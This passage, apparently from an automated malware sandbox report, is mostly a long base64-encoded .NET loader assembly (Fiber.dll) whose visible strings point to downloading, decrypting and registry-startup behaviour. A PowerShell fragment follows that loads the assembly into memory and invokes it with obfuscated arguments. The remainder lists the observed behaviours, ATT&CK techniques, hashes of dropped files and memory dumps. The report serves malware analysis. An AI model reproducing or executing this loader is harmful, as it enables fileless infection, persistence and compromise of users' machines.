pbmRvd1N0eWxlAFByb2Nlc3NXaW5kb3dTdHlsZQBnZXRfTmFtZQBzZXRfRmlsZU5hbWUAYXBwbGljYXRpb25OYW1lAEdldERpcmVjdG9yeU5hbWUASG9tZQBjb21tYW5kTGluZQBDb21iaW5lAENoYW5nZVR5cGUAVmFsdWVUeXBlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUAdHlwZQBTeXN0ZW0uQ29yZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAQ2xvc2UAU3RyUmV2ZXJzZQBNdWx0aWNhc3REZWxlZ2F0ZQBEZWxlZ2F0ZUFzeW5jU3RhdGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUARGVidWdnZXJIaWRkZW5BdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBPYmZ1c2NhdGlvbkF0dHJpYnV0ZQBNeUdyb3VwQ29sbGVjdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFlhbm9BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBTZXRWYWx1ZQBhZGRfUmVzb3VyY2VSZXNvbHZlAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAHN0YXJ0dXBfcmVnAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAQ29tcGFyZVN0cmluZwBUb1N0cmluZwBSZWZyZXNoAEdldEZ1bGxQYXRoAEdldEZvbGRlclBhdGgAbGVuZ3RoAEFzeW5jQ2FsbGJhY2sARGVsZWdhdGVDYWxsYmFjawBNYXJzaGFsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABGaWJlci5kbGwAS2lsbABzZXRfU2VjdXJpdHlQcm90b2NvbABHZXRNYW5pZmVzdFJlc291cmNlU3RyZWFtAERlZmxhdGVTdHJlYW0AQ3J5cHRvU3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAFJhbmRvbQBJQ3J5cHRvVHJhbnNmb3JtAEJvb2xlYW4AYnl0ZXNXcml0dGVuAEFwcERvbWFpbgBnZXRfQ3VycmVudERvbWFpbgBHZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24AVmVyc2lvbgBTeXN0ZW0uSU8uQ29tcHJlc3Npb24AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AcHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBJbnRlcm4AQ29weVRvAEZpbGVJbmZvAEN1bHR1cmVJbmZvAEZpbGVTeXN0ZW1JbmZvAHN0YXJ0dXBJbmZvAHNldF9TdGFydEluZm8AUHJvY2Vzc1N0YXJ0SW5mbwBEaXJlY3RvcnlJbmZvAFplcm8Ac3RhcnR1cABTeXN0ZW0uTGlucQBGaWJlcgBERVNDcnlwdG9TZXJ2aWNlUHJvdmlkZXIAU3BlY2lhbEZvbGRlcgBCdWZmZXIAYnVmZmVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBSZXNvbHZlRXZlbnRIYW5kbGVyAGdldF9Vc2VyAEN1cnJlbnRVc2VyAFRvR2VuZXJpY1BhcmFtZXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBCaXRDb252ZXJ0ZXIAZ2V0X0NvbXB1dGVyAE15Q29tcHV0ZXIAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5NeS5SZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAaW5oZXJpdEhhbmRsZXMAR2V0RmlsZXMAR2V0TWFuaWZlc3RSZXNvdXJjZU5hbWVzAEdldFZhbHVlTmFtZXMAdGhyZWFkQXR0cmlidXRlcwBwcm9jZXNzQXR0cmlidXRlcwBHZXRCeXRlcwBjcmVhdGlvbkZsYWdzAFN0cmluZ3MAZ2V0X1NldHRpbmdzAE15U2V0dGluZ3MAUmVzb2x2ZUV2ZW50QXJncwBSZWZlcmVuY2VFcXVhbHMAVG9vbHMAQ29udGFpbnMAQ29udmVyc2lvbnMAUnVudGltZUhlbHBlcnMAT3BlcmF0b3JzAGhQcm9jZXNzAHByb2Nlc3MAR2V0UHJvY0FkZHJlc3MAYmFzZUFkZHJlc3MAYWRkcmVzcwBzZXRfQXJndW1lbnRzAEV4aXN0cwBDb25jYXQARm9ybWF0AENyZWF0ZU9iamVjdABSZWxlYXNlQ29tT2JqZWN0AE15UHJvamVjdABwcm90ZWN0AExhdGVHZXQAU3lzdGVtLk5ldABMYXRlU2V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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.ozza4*●*☞#:▶55.94.0](∞ú(](∞ú(.974*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
0e8bf7ee78ded0c6ac1ecc0da59bdd60

SHA1
9cfccd5bea3b10f651a78344d2eff36c8b86bc5e

SHA256
3080e81f07299ccb04cae8cb6ed984bf5060a900e7b3025eadf9d7c0bcaa41bc

SHA512
b5ce7e30c9d88f84819b2aa1a9de7aab171f752e1f58486bf3138ee4dfbf87fdcbb66566c7892bda7114aad77a6343db0b652ed21ebc6efae0833ea9549f90de

Download Submit
C:\Users\Admin\AppData\Roaming\efcopjgu.vbs

Filesize
389KB

MD5
6f3acea03b03330f0fdd88c2f0e272eb

SHA1
d22079d43939d8344e7f7109da4e46907f8d3565

SHA256
dc17b3ab2696bd979570b489cfc2775a74d8221a812f1e60eb93ba5222705ac9

SHA512
f30587d9f11bbd2a6915401e2ed95e945d2da3b58ccd42ff680bdd36bb663bf617325e93a4b428861194abc2e21577191fbc08a4d948a2355378c79b44ad8e56

Download Submit
C:\Users\Admin\AppData\Roaming\efcopjgu.vbs

Filesize
389KB

MD5
6f3acea03b03330f0fdd88c2f0e272eb

SHA1
d22079d43939d8344e7f7109da4e46907f8d3565

SHA256
dc17b3ab2696bd979570b489cfc2775a74d8221a812f1e60eb93ba5222705ac9

SHA512
f30587d9f11bbd2a6915401e2ed95e945d2da3b58ccd42ff680bdd36bb663bf617325e93a4b428861194abc2e21577191fbc08a4d948a2355378c79b44ad8e56

Download Submit
memory/1800-77-0x000000002F350000-0x000000002F4AD000-memory.dmp

Filesize
1.4MB

Download
memory/1800-56-0x000000007137D000-0x0000000071388000-memory.dmp

Filesize
44KB

Download
memory/1800-54-0x000000002F350000-0x000000002F4AD000-memory.dmp

Filesize
1.4MB

Download
memory/1800-79-0x000000007137D000-0x0000000071388000-memory.dmp

Filesize
44KB

Download
memory/1800-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1800-101-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1800-102-0x000000007137D000-0x0000000071388000-memory.dmp

Filesize
44KB

Download
memory/2812-69-0x000000006B1C0000-0x000000006B76B000-memory.dmp

Filesize
5.7MB

Download
memory/2812-70-0x000000006B1C0000-0x000000006B76B000-memory.dmp

Filesize
5.7MB

Download
memory/2812-71-0x00000000027D0000-0x0000000002810000-memory.dmp

Filesize
256KB

Download
memory/2812-76-0x00000000027D0000-0x0000000002810000-memory.dmp

Filesize
256KB

Download
memory/2812-78-0x000000006B1C0000-0x000000006B76B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing